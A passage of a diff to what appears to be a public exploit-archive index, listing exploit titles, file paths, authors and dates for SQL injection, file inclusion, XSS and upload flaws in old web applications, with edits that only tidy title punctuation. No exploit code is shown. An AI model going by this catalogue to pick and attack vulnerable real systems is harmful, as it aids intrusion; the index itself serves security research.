'fonctions_racine.php' Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 -9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 +9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - 'user_id' SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 @@ -22321,36 +22322,36 @@ id,file,description,date,author,platform,type,port 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php?cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - 'hotel_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9633,platforms/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - 'user_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injections",2009-09-10,"Salvatore Fresta",php,webapps,0 -9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - 'index.php show' SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 +9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - 'index.php?show' SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps,0 -9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 +9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - 'maincat_id' SQL Injection",2009-09-11,noname,php,webapps,0 9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,php,webapps,0 -9653,platforms/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 +9653,platforms/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - 'Name' SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 -9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0 +9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - 'page' SQL Injection",2009-09-14,Bgh7,php,webapps,0 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 -9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - 'database.php path' Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0 -9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 +9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - 'database.php?path' Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0 +9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - 'cat' Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps,0 -9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 -9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 +9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - 'platform' SQL Injection",2009-09-16,snakespc,php,webapps,0 +9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - 'include_class' Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 -9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php path' Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 +9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0 @@ -22369,7 +22370,7 @@ id,file,description,date,author,platform,type,port 9728,platforms/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusions",2009-09-21,cr4wl3r,multiple,webapps,0 9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 -9732,platforms/multiple/webapps/9732.txt,"Joomla! Component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 +9732,platforms/multiple/webapps/9732.txt,"Joomla! Component com_jinc 0.2 - 'newsid' Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla! Component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9801,platforms/php/webapps/9801.txt,"Flatpress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9809,platforms/asp/webapps/9809.txt,"HEAT Call Logging 8.01 - SQL Injection",2009-09-28,"0 0",asp,webapps,0 @@ -22425,7 +22426,7 @@ id,file,description,date,author,platform,type,port 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 -9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 +9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - 'graph_view.php' Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 @@ -22481,7 +22482,7 @@ id,file,description,date,author,platform,type,port 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 -10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript - (aid) Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 +10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript - 'aid' Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 - HTML / Cross-Site Scripting Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 @@ -22493,11 +22494,11 @@ id,file,description,date,author,platform,type,port 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80 10189,platforms/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps,0 -10192,platforms/php/webapps/10192.txt,"Joomla! Component Com_Joomclip - (cat) SQL Injection",2009-11-21,"599eme Man",php,webapps,0 +10192,platforms/php/webapps/10192.txt,"Joomla! Component Com_Joomclip - 'cat' SQL Injection",2009-11-21,"599eme Man",php,webapps,0 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 40303,platforms/cgi/webapps/40303.sh,"Intellinet IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",cgi,webapps,80 40304,platforms/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",cgi,webapps,80 -10214,platforms/php/webapps/10214.txt,"Joomla! Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 +10214,platforms/php/webapps/10214.txt,"Joomla! Component mygallery - 'farbinform_krell' SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 10217,platforms/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusions",2009-11-24,cr4wl3r,php,webapps,0 10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 @@ -22510,7 +22511,7 @@ id,file,description,date,author,platform,type,port 10228,platforms/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Exploit",2009-11-25,MustLive,php,webapps,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 -10232,platforms/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 +10232,platforms/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - 'gcid' SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 10236,platforms/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Uploads",2009-11-26,DigitALL,php,webapps,0 @@ -22526,7 +22527,7 @@ id,file,description,date,author,platform,type,port 10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS - SQL Injection",2009-11-30,Isfahan,asp,webapps,0 10254,platforms/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps,0 10256,platforms/php/webapps/10256.txt,"WordPress Plugin WP-Polls 2.x - Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 -10259,platforms/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,cr4wl3r,php,webapps,0 +10259,platforms/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - 'module_path' Remote File Inclusion",2009-12-01,cr4wl3r,php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,linux,webapps,80 @@ -22546,7 +22547,7 @@ id,file,description,date,author,platform,type,port 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - 'prodid' SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -22560,7 +22561,7 @@ id,file,description,date,author,platform,type,port 10318,platforms/php/webapps/10318.txt,"Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10324,platforms/php/webapps/10324.txt,"phpShop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"WordPress Plugin Image Manager - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 -10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion",2009-12-06,cr4wl3r,php,webapps,0 +10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - 'language_path' Remote File Inclusion",2009-12-06,cr4wl3r,php,webapps,0 10330,platforms/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 @@ -22569,7 +22570,7 @@ id,file,description,date,author,platform,type,port 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0 -10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0 +10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - 'showMoreUse' SQL Injection",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0 @@ -22635,7 +22636,7 @@ id,file,description,date,author,platform,type,port 10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-15,"Milos Zivanovic",php,webapps,0 10453,platforms/php/webapps/10453.txt,"SitioOnline - SQL Injection",2009-12-15,4lG3r14n0-t3r0,php,webapps,0 10454,platforms/php/webapps/10454.txt,"Ez Faq Maker - Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 -10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - (PageId) SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 +10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - 'PageId' SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP - 'sitedetails.asp siteid' SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps,0 @@ -22664,7 +22665,7 @@ id,file,description,date,author,platform,type,port 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0 10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 -10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 +10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php?id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -22672,7 +22673,7 @@ id,file,description,date,author,platform,type,port 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 +10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - 'ContentID' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 @@ -22686,7 +22687,7 @@ id,file,description,date,author,platform,type,port 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Authentication Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp catid' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 -10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php HotelID' SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 +10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 @@ -22727,7 +22728,7 @@ id,file,description,date,author,platform,type,port 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla! Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 -10588,platforms/php/webapps/10588.txt,"PDQ Script 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 +10588,platforms/php/webapps/10588.txt,"PDQ Script 1.0 - 'listingid' SQL Injection",2009-12-21,SecurityRules,php,webapps,0 10590,platforms/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection",2009-12-21,Stack,php,webapps,0 10591,platforms/php/webapps/10591.txt,"Joomla! Component com_mediaslide - Directory Traversal",2009-12-21,Mr.tro0oqy,php,webapps,0 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 @@ -22743,7 +22744,7 @@ id,file,description,date,author,platform,type,port 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script - Arbitrary File Upload",2009-12-23,MR.Z,php,webapps,0 10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps,0 -10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 +10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection",2009-12-23,"Hussin X",php,webapps,0 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla! Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla! Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps,0 @@ -22813,7 +22814,7 @@ id,file,description,date,author,platform,type,port 10711,platforms/php/webapps/10711.txt,"phpAuction - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10712,platforms/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 -10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php id' SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 +10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php?id' SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 10717,platforms/php/webapps/10717.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0 10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 @@ -22827,7 +22828,7 @@ id,file,description,date,author,platform,type,port 10729,platforms/php/webapps/10729.txt,"Joomla! Component com_adagency - Exploit",2009-12-27,FL0RiX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla! Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,php,webapps,0 10731,platforms/php/webapps/10731.txt,"Joomla! Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 -10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Arbitrary File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 +10732,platforms/php/webapps/10732.txt,"PHP upload - 'unijimpe' Arbitrary File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 10734,platforms/php/webapps/10734.txt,"Joomla! Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,php,webapps,0 10735,platforms/php/webapps/10735.txt,"com_jm-recommend - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 @@ -22869,7 +22870,7 @@ id,file,description,date,author,platform,type,port 10789,platforms/php/webapps/10789.txt,"Joomla! Component com_noticia - Cross-Site Scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps,0 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 -10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0 